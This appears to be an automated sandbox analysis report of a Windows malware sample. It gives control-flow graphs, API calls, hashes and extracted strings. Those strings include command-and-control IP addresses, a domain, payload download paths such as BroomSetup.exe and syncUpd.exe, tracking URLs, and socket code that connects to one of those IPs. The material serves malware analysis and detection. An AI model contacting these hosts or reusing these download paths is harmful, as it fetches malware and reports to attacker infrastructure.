401a67 call 401adf call 426504 call 40ff7e call 403491 * 14 call 40197c call 403491 * 12 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 0->129 130 424eb7 0->130 499 425e40-425eb7 call 4019f8 * 2 call 401ae8 call 4019f8 call 401ae8 call 401a11 call 401ae8 * 4 129->499 500 425848-425893 call 40b5a0 call 410c91 call 4262d2 call 426217 129->500 132 424ef2-424ef7 130->132 133 424ec1-424ec6 130->133 134 424ed6-424edb 130->134 135 424ee4-424ee9 130->135 136 424eeb-424ef0 130->136 137 424ec8-424ecd 130->137 138 424ef9 130->138 139 424ebe-424ebf 130->139 140 424ecf-424ed4 130->140 141 424edd-424ee2 130->141 142 424efe-424f02 call 401adf 132->142 133->142 134->142 135->142 136->142 137->142 138->142 139->142 140->142 141->142 142->129 517 425895-4258a7 call 401b1e call 426260 500->517 518 4258af-425ac6 call 40ff7e call 403491 * 16 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 500->518 529 4258ac 517->529 613 425bcf-425db7 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 518->613 614 425acc-425ba6 call 40b5a0 call 403491 * 12 call 40197c call 42631a call 426217 518->614 529->518 729 425e2b-425e3b call 4019f8 * 2 613->729 730 425db9-425e02 call 40b5a0 call 410c91 call 4262d2 call 426217 613->730 680 425bc2-425bc9 call 40ff7e 614->680 681 425ba8-425bba call 401b1e call 426260 614->681 687 425bce 680->687 691 425bbf 681->691 687->613 691->680 729->499 742 425e04-425e16 call 401b1e call 426260 730->742 743 425e1e-425e25 call 40ff7e 730->743 749 425e1b 742->749 747 425e2a 743->747 747->729 749->743
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                                                                        • String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
                                                                                                                                                                                                                                                                                        • API String ID: 2531350358-4166474000
                                                                                                                                                                                                                                                                                        • Opcode ID: 4748807601ff07c0b267dde55d5161103cca83be6345b95c0a65a9138efbd89a
                                                                                                                                                                                                                                                                                        • Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4748807601ff07c0b267dde55d5161103cca83be6345b95c0a65a9138efbd89a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00426504 Relevance: 50.1, APIs: 17, Strings: 11, Instructions: 1148networkthreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 750 426504-427062 call 4275a4 call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 1223 427068-42706b 750->1223 1224 42717c-42719d call 401aa1 WSAStartup 750->1224 1223->1224 1225 427071-427177 call 403491 * 16 call 40197c call 401aa1 call 403ae1 SetThreadLocale call 401ae8 call 401aa1 1223->1225 1229 4271a3-4271b9 socket 1224->1229 1230 427571 1224->1230 1225->1224 1232 4271d0-4271e3 call 401a67 gethostbyname 1229->1232 1233 4271bb-4271cb call 40ff7e WSACleanup 1229->1233 1235 427574-42757d call 40ff7e 1230->1235 1232->1235 1245 4271e9-427225 call 40aaa0 htons connect 1232->1245 1244 42758b-4275a3 call 401ae8 1233->1244 1247 42757e-427585 WSACleanup closesocket 1235->1247 1245->1235 1254 42722b-427247 call 403da5 call 401a67 send 1245->1254 1247->1244 1254->1235 1265 42724d-427251 1254->1265 1266 427253-427263 send 1265->1266 1267 427269-42728d call 40b5a0 1265->1267 1266->1235 1266->1267 1273 42728f-4272a3 recv 1267->1273 1273->1235 1275 4272a9-4272ae 1273->1275 1277 4273b6-4273bf 1275->1277 1278 4272b4-4272bc 1275->1278 1277->1235 1280 4273c5-4273c8 1277->1280 1278->1277 1281 4272c2-4272ca 1278->1281 1280->1273 1281->1277 1283 4272d0-4272db 1281->1283 1285 427300-427309 1283->1285 1286 4272dd-4272f2 call 412faf 1283->1286 1290 42730c-427311 1285->1290 1286->1235 1296 4272f8-4272fb 1286->1296 1290->1290 1293 427313-427315 1290->1293 1294 42731b-427330 call 403a0c 1293->1294 1295 4273cd-4273d2 1293->1295 1301 4273ad-4273b3 1294->1301 1311 427332-427352 call 412faf 1294->1311 1299 4273d4-4273d8 1295->1299 1300 4273df-4273e3 1295->1300 1296->1301 1304 4273da 1299->1304 1305 4273e9-427405 call 426127 1299->1305 1300->1305 1306 427515-427517 1300->1306 1301->1277 1304->1235 1322 427408-42740a 1305->1322 1309 42755b-427568 call 426127 1306->1309 1310 427519-427532 call 426127 1306->1310 1327 42756a-42756f 1309->1327 1324 427535-427548 recv 1310->1324 1325 427376-42738e call 412faf 1311->1325 1326 427354-42736e call 41196d 1311->1326 1328 42740d-427421 recv 1322->1328 1324->1235 1330 42754a-427557 1324->1330 1325->1301 1342 427390-4273aa call 412faf 1325->1342 1326->1235 1341 427374 1326->1341 1327->1247 1328->1235 1333 427427-42742c 1328->1333 1330->1324 1335 427559 1330->1335 1338 427432-427437 1333->1338 1339 4274fb-427502 1333->1339 1335->1327 1338->1339 1343 42743d-427442 1338->1343 1339->1328 1344 427508 1339->1344 1341->1301 1342->1301 1343->1339 1347 427448-427469 call 41196d 1343->1347 1344->1235 1347->1235 1353 42746f-427471 1347->1353 1353->1235 1355 427477 1353->1355 1357 42750a-427513 1355->1357 1358 42747d-427489 1355->1358 1357->1327 1360 4274a5-4274a7 1358->1360 1361 42748b-4274a2 call 42611d 1358->1361 1363 4274aa-4274c0 recv 1360->1363 1361->1360 1363->1235 1365 4274c6-4274d3 1363->1365 1365->1363 1366 4274d5-4274e7 recv 1365->1366 1366->1235 1367 4274ed-4274f6 1366->1367 1367->1322
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00426509
                                                                                                                                                                                                                                                                                        • SetThreadLocale.KERNEL32(00000000,0043CF38,?,185.172.128.90,00000000), ref: 0042715F
                                                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 00427195
                                                                                                                                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
                                                                                                                                                                                                                                                                                        • WSACleanup.WS2_32 ref: 004271C5
                                                                                                                                                                                                                                                                                        • gethostbyname.WS2_32(00000000), ref: 004271D9
                                                                                                                                                                                                                                                                                        • htons.WS2_32(?), ref: 0042720B
                                                                                                                                                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 0042721C
                                                                                                                                                                                                                                                                                        • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
                                                                                                                                                                                                                                                                                        • send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
                                                                                                                                                                                                                                                                                        • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
                                                                                                                                                                                                                                                                                        • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
                                                                                                                                                                                                                                                                                        • recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
                                                                                                                                                                                                                                                                                        • recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
                                                                                                                                                                                                                                                                                        • recv.WS2_32(00000000,?,?,00000000), ref: 00427540
                                                                                                                                                                                                                                                                                        • WSACleanup.WS2_32 ref: 0042757E
                                                                                                                                                                                                                                                                                        • closesocket.WS2_32(?), ref: 00427585
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: recv$Cleanupsend$H_prologLocaleStartupThreadclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                                        • String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                                                                                        • API String ID: 1963173973-3676584321
                                                                                                                                                                                                                                                                                        • Opcode ID: 44dfa501eee85b168214652f80630de655cf10f9296c47a00c0b463c29df297d
                                                                                                                                                                                                                                                                                        • Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44dfa501eee85b168214652f80630de655cf10f9296c47a00c0b463c29df297d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1695 4139e7-4139f3 call 4177fa 1698 413a15-413a21 call 413a6c ExitProcess 1695->1698 1699 4139f5-413a03 GetPEB 1695->1699 1699->1698 1701 413a05-413a0f GetCurrentProcess TerminateProcess 1699->1701 1701->1698
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                                                                        • Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042EE29E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1740 42ee29e-42ee2b7 1741 42ee2b9-42ee2bb 1740->1741 1742 42ee2bd 1741->1742 1743 42ee2c2-42ee2ce CreateToolhelp32Snapshot 1741->1743 1742->1743 1744 42ee2de-42ee2eb Module32First 1743->1744 1745 42ee2d0-42ee2d6 1743->1745 1746 42ee2ed-42ee2ee call 42edf5d 1744->1746 1747 42ee2f4-42ee2fc 1744->1747 1745->1744 1752 42ee2d8-42ee2dc 1745->1752 1750 42ee2f3 1746->1750 1750->1747 1752->1741 1752->1744
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 042EE2C6
                                                                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 042EE2E6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 042ED000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_42ed000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                        • Instruction ID: 208434f1f154d8e6951b5592d0adbbb0a240c7829933ac75a074fa9940aa22e5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1F062327107126BE7202FF69C8CABE76E8AF49724F510529E656914C1DFB0F8458A61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041A36B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1368 41a36b-41a39b call 41a0ce 1371 41a3b6-41a3c2 call 41e7d7 1368->1371 1372 41a39d-41a3a8 call 41236e 1368->1372 1377 41a3c4-41a3d9 call 41236e call 412381 1371->1377 1378 41a3db-41a424 call 41a039 1371->1378 1379 41a3aa-41a3b1 call 412381 1372->1379 1377->1379 1387 41a491-41a49a GetFileType 1378->1387 1388 41a426-41a42f 1378->1388 1389 41a68d-41a693 1379->1389 1390 41a4e3-41a4e6 1387->1390 1391 41a49c-41a4cd GetLastError call 41234b CloseHandle 1387->1391 1393 41a431-41a435 1388->1393 1394 41a466-41a48c GetLastError call 41234b 1388->1394 1397 41a4e8-41a4ed 1390->1397 1398 41a4ef-41a4f5 1390->1398 1391->1379 1405 41a4d3-41a4de call 412381 1391->1405 1393->1394 1399 41a437-41a464 call 41a039 1393->1399 1394->1379 1402 41a4f9-41a547 call 41e720 1397->1402 1398->1402 1403 41a4f7 1398->1403 1399->1387 1399->1394 1410 41a557-41a57b call 419dec 1402->1410 1411 41a549-41a555 call 41a24a 1402->1411 1403->1402 1405->1379 1418 41a57d 1410->1418 1419 41a58e-41a5d1 1410->1419 1411->1410 1417 41a57f-41a589 call 4163fd 1411->1417 1417->1389 1418->1417 1421 41a5d3-41a5d7 1419->1421 1422 41a5f2-41a600 1419->1422 1421->1422 1424 41a5d9-41a5ed 1421->1424 1425 41a606-41a60a 1422->1425 1426 41a68b 1422->1426 1424->1422 1425->1426 1427 41a60c-41a63f CloseHandle call 41a039 1425->1427 1426->1389 1430 41a641-41a66d GetLastError call 41234b call 41e8e9 1427->1430 1431 41a673-41a687 1427->1431 1430->1431 1431->1426
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A47F
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A486
                                                                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 0041A492
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A49C
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A4A5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041A4C5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0041A60F
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A641
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A648
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                        • Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                                                                        • Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1436 4192ad-4192bd 1437 4192d7-4192d9 1436->1437 1438 4192bf-4192d2 call 41236e call 412381 1436->1438 1440 419641-41964e call 41236e call 412381 1437->1440 1441 4192df-4192e5 1437->1441 1454 419659 1438->1454 1459 419654 call 410905 1440->1459 1441->1440 1444 4192eb-419316 1441->1444 1444->1440 1447 41931c-419325 1444->1447 1450 419327-41933a call 41236e call 412381 1447->1450 1451 41933f-419341 1447->1451 1450->1459 1452 419347-41934b 1451->1452 1453 41963d-41963f 1451->1453 1452->1453 1457 419351-419355 1452->1457 1458 41965c-419661 1453->1458 1454->1458 1457->1450 1461 419357-41936e 1457->1461 1459->1454 1465 419370-419373 1461->1465 1466 41938b-419394 1461->1466 1467 419375-41937b 1465->1467 1468 41937d-419386 1465->1468 1469 4193b2-4193bc 1466->1469 1470 419396-4193ad call 41236e call 412381 call 410905 1466->1470 1467->1468 1467->1470 1473 419427-419441 1468->1473 1471 4193c3-4193e1 call 417a45 call 41629a * 2 1469->1471 1472 4193be-4193c0 1469->1472 1498 419574 1470->1498 1506 4193e3-4193f9 call 412381 call 41236e 1471->1506 1507 4193fe-419424 call 419800 1471->1507 1472->1471 1475 419515-41951e call 421229 1473->1475 1476 419447-419457 1473->1476 1489 419591 1475->1489 1490 419520-419532 1475->1490 1476->1475 1479 41945d-41945f 1476->1479 1479->1475 1483 419465-41948b 1479->1483 1483->1475 1487 419491-4194a4 1483->1487 1487->1475 1492 4194a6-4194a8 1487->1492 1494 419595-4195ad ReadFile 1489->1494 1490->1489 1495 419534-419543 GetConsoleMode 1490->1495 1492->1475 1499 4194aa-4194d5 1492->1499 1501 419609-419614 GetLastError 1494->1501 1502 4195af-4195b5 1494->1502 1495->1489 1497 419545-419549 1495->1497 1497->1494 1503 41954b-419565 ReadConsoleW 1497->1503 1504 419577-419581 call 41629a 1498->1504 1499->1475 1505 4194d7-4194ea 1499->1505 1508 419616-419628 call 412381 call 41236e 1501->1508 1509 41962d-419630 1501->1509 1502->1501 1510 4195b7 1502->1510 1511 419567 GetLastError 1503->1511 1512 419586-41958f 1503->1512 1504->1458 1505->1475 1516 4194ec-4194ee 1505->1516 1506->1498 1507->1473 1508->1498 1513 419636-419638 1509->1513 1514 41956d-419573 call 41234b 1509->1514 1520 4195ba-4195cc 1510->1520 1511->1514 1512->1520 1513->1504 1514->1498 1516->1475 1525 4194f0-419510 1516->1525 1520->1504 1522 4195ce-4195d2 1520->1522 1529 4195d4-4195e4 call 418fc9 1522->1529 1530 4195eb-4195f6 1522->1530 1525->1475 1541 4195e7-4195e9 1529->1541 1535 419602-419607 call 418e09 1530->1535 1536 4195f8 call 419119 1530->1536 1542 4195fd-419600 1535->1542 1536->1542 1541->1504 1542->1541
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 61a73f421457aa077d894feb0bde5e1120c8ebbb8ea37a77e9a8ae1e980a73e5
                                                                                                                                                                                                                                                                                        • Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61a73f421457aa077d894feb0bde5e1120c8ebbb8ea37a77e9a8ae1e980a73e5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1544 420003c-4200047 1545 4200049 1544->1545 1546 420004c-4200263 call 4200a3f call 4200e0f call 4200d90 VirtualAlloc 1544->1546 1545->1546 1561 4200265-4200289 call 4200a69 1546->1561 1562 420028b-4200292 1546->1562 1566 42002ce-42003c2 VirtualProtect call 4200cce call 4200ce7 1561->1566 1563 42002a1-42002b0 1562->1563 1565 42002b2-42002cc 1563->1565 1563->1566 1565->1563 1573 42003d1-42003e0 1566->1573 1574 42003e2-4200437 call 4200ce7 1573->1574 1575 4200439-42004b8 VirtualFree 1573->1575 1574->1573 1577 42005f4-42005fe 1575->1577 1578 42004be-42004cd 1575->1578 1579 4200604-420060d 1577->1579 1580 420077f-4200789 1577->1580 1582 42004d3-42004dd 1578->1582 1579->1580 1584 4200613-4200637 1579->1584 1586 42007a6-42007b0 1580->1586 1587 420078b-42007a3 1580->1587 1582->1577 1583 42004e3-4200505 LoadLibraryA 1582->1583 1588 4200517-4200520 1583->1588 1589 4200507-4200515 1583->1589 1592 420063e-4200648 1584->1592 1590 42007b6-42007cb 1586->1590 1591 420086e-42008be LoadLibraryA 1586->1591 1587->1586 1593 4200526-4200547 1588->1593 1589->1593 1594 42007d2-42007d5 1590->1594 1600 42008c7-42008f9 1591->1600 1592->1580 1595 420064e-420065a 1592->1595 1598 420054d-4200550 1593->1598 1596 4200824-4200833 1594->1596 1597 42007d7-42007e0 1594->1597 1595->1580 1599 4200660-420066a 1595->1599 1608 4200839-420083c 1596->1608 1603 42007e2 1597->1603 1604 42007e4-4200822 1597->1604 1605 42005e0-42005ef 1598->1605 1606 4200556-420056b 1598->1606 1607 420067a-4200689 1599->1607 1601 4200902-420091d 1600->1601 1602 42008fb-4200901 1600->1602 1602->1601 1603->1596 1604->1594 1605->1582 1609 420056d 1606->1609 1610 420056f-420057a 1606->1610 1611 4200750-420077a 1607->1611 1612 420068f-42006b2 1607->1612 1608->1591 1613 420083e-4200847 1608->1613 1609->1605 1615 420059b-42005bb 1610->1615 1616 420057c-4200599 1610->1616 1611->1592 1617 42006b4-42006ed 1612->1617 1618 42006ef-42006fc 1612->1618 1619 4200849 1613->1619 1620 420084b-420086c 1613->1620 1627 42005bd-42005db 1615->1627 1616->1627 1617->1618 1621 420074b 1618->1621 1622 42006fe-4200748 1618->1622 1619->1591 1620->1608 1621->1607 1622->1621 1627->1598
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0420024D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                        • Instruction ID: d8f387950e94e0f911890dd075781802a2d2187e6bf4e70d8d513a47c1733b33
